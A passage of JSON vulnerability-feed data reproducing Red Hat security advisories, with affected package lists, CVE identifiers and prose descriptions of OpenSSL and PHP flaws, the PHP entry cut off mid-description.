"openssl", "packageFilename": "openssl-0.9.8e-12.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-12.el5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-12.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-12.el5.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-12.el5.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-12.el5.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-12.el5.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-12.el5.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-12.el5.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-12.el5.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-12.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-12.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-12.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a full-strength\ngeneral purpose cryptography library. Datagram TLS (DTLS) is a protocol\nbased on TLS that is capable of securing datagram transport (for example,\nUDP).\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS\nimplementation. A remote attacker could use these flaws to cause a DTLS\nserver to use excessive amounts of memory, or crash on an invalid memory\naccess or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Red Hat does not\nship any DTLS client or server applications in Red Hat Enterprise Linux.\n\nAn input validation flaw was found in the handling of the BMPString and\nUniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex()\nfunction. An attacker could use this flaw to create a specially-crafted\nX.509 certificate that could cause applications using the affected function\nto crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Red\nHat Enterprise Linux calls this function, for example.\n\nThese updated packages also fix the following bugs:\n\n* \"openssl smime -verify -in\" verifies the signature of the input file and\nthe \"-verify\" switch expects a signed or encrypted input file. Previously,\nrunning openssl on an S/MIME file that was not encrypted or signed caused\nopenssl to segfault. With this update, the input file is now checked for a\nsignature or encryption. Consequently, openssl now returns an error and\nquits when attempting to verify an unencrypted or unsigned S/MIME file.\n(BZ#472440)\n\n* when generating RSA keys, pairwise tests were called even in non-FIPS\nmode. This prevented small keys from being generated. With this update,\ngenerating keys in non-FIPS mode no longer calls the pairwise tests and\nkeys as small as 32-bits can be generated in this mode. Note: In FIPS mode,\npairwise tests are still called and keys generated in this mode must still\nbe 1024-bits or larger. (BZ#479817)\n\nAs well, these updated packages add the following enhancements:\n\n* both the libcrypto and libssl shared libraries, which are part of the\nOpenSSL FIPS module, are now checked for integrity on initialization of\nFIPS mode. (BZ#475798)\n\n* an issuing Certificate Authority (CA) allows multiple certificate\ntemplates to inherit the CA's Common Name (CN). Because this CN is used as\na unique identifier, each template had to have its own Certificate\nRevocation List (CRL). With this update, multiple CRLs with the same\nsubject name can now be stored in a X509_STORE structure, with their\nsignature field being used to distinguish between them. (BZ#457134)\n\n* the fipscheck library is no longer needed for rebuilding the openssl\nsource RPM. (BZ#475798)\n\nOpenSSL users should upgrade to these updated packages, which resolve these\nissues and add these enhancements.", "reporter": "RedHat", "published": "2009-09-02T13:47:12", "type": "redhat", "title": "(RHSA-2009:1335) Moderate: openssl security, bug fix, and enhancement update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-7250", "CVE-2009-0590", "CVE-2009-1377", "CVE-2009-1378", "CVE-2009-1379", "CVE-2009-1386", "CVE-2009-1387"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:20:32", "id": "RHSA-2009:1335", "href": "https://access.redhat.com/errata/RHSA-2009:1335", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-09T07:19:37", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-snmp", "packageFilename": "php-snmp-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-common", "packageFilename": "php-common-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-odbc", "packageFilename": "php-odbc-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-devel", "packageFilename": "php-devel-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-pdo", "packageFilename": "php-pdo-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-xml", "packageFilename": "php-xml-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-soap", "packageFilename": "php-soap-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-cli", "packageFilename": "php-cli-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-imap", "packageFilename": "php-imap-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-gd", "packageFilename": "php-gd-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-ncurses", "packageFilename": "php-ncurses-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php", "packageFilename": "php-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-ldap", "packageFilename": "php-ldap-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-dba", "packageFilename": "php-dba-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-mysql", "packageFilename": "php-mysql-5.1.6-23.2.el5_3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php", "packageFilename": "php-5.1.6-23.2.el5_3.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-soap", "packageFilename": "php-soap-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-xml", "packageFilename": "php-xml-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-common", "packageFilename": "php-common-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-cli", "packageFilename": "php-cli-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-devel", "packageFilename": "php-devel-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-ldap", "packageFilename": "php-ldap-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-odbc", "packageFilename": "php-odbc-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-imap", "packageFilename": "php-imap-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-ncurses", "packageFilename": "php-ncurses-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-snmp", "packageFilename": "php-snmp-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-dba", "packageFilename": "php-dba-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php", "packageFilename": "php-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-pdo", "packageFilename": "php-pdo-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-mysql", "packageFilename": "php-mysql-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-gd", "packageFilename": "php-gd-5.1.6-23.2.el5_3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-common", "packageFilename": "php-common-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php", "packageFilename": "php-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-soap", "packageFilename": "php-soap-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-xml", "packageFilename": "php-xml-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-imap", "packageFilename": "php-imap-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-ldap", "packageFilename": "php-ldap-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-ncurses", "packageFilename": "php-ncurses-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-dba", "packageFilename": "php-dba-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-odbc", "packageFilename": "php-odbc-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-cli", "packageFilename": "php-cli-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-mysql", "packageFilename": "php-mysql-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-devel", "packageFilename": "php-devel-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-snmp", "packageFilename": "php-snmp-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-pdo", "packageFilename": "php-pdo-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-gd", "packageFilename": "php-gd-5.1.6-23.2.el5_3.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-odbc", "packageFilename": "php-odbc-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-pdo", "packageFilename": "php-pdo-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-dba", "packageFilename": "php-dba-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-ldap", "packageFilename": "php-ldap-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php", "packageFilename": "php-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-cli", "packageFilename": "php-cli-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-xml", "packageFilename": "php-xml-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-imap", "packageFilename": "php-imap-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-ncurses", "packageFilename": "php-ncurses-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-common", "packageFilename": "php-common-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-gd", "packageFilename": "php-gd-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-soap", "packageFilename": "php-soap-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-devel", "packageFilename": "php-devel-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-mysql", "packageFilename": "php-mysql-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-snmp", "packageFilename": "php-snmp-5.1.6-23.2.el5_3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-snmp", "packageFilename": "php-snmp-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-devel", "packageFilename": "php-devel-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-soap", "packageFilename": "php-soap-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-pdo", "packageFilename": "php-pdo-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-ldap", "packageFilename": "php-ldap-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-ncurses", "packageFilename": "php-ncurses-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-imap", "packageFilename": "php-imap-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-odbc", "packageFilename": "php-odbc-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php", "packageFilename": "php-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-gd", "packageFilename": "php-gd-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-common", "packageFilename": "php-common-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-mysql", "packageFilename": "php-mysql-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-xml", "packageFilename": "php-xml-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-dba", "packageFilename": "php-dba-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-cli", "packageFilename": "php-cli-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.1.6-23.2.el5_3.ia64.rpm", "arch": "ia64", "operator": "lt"}], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass 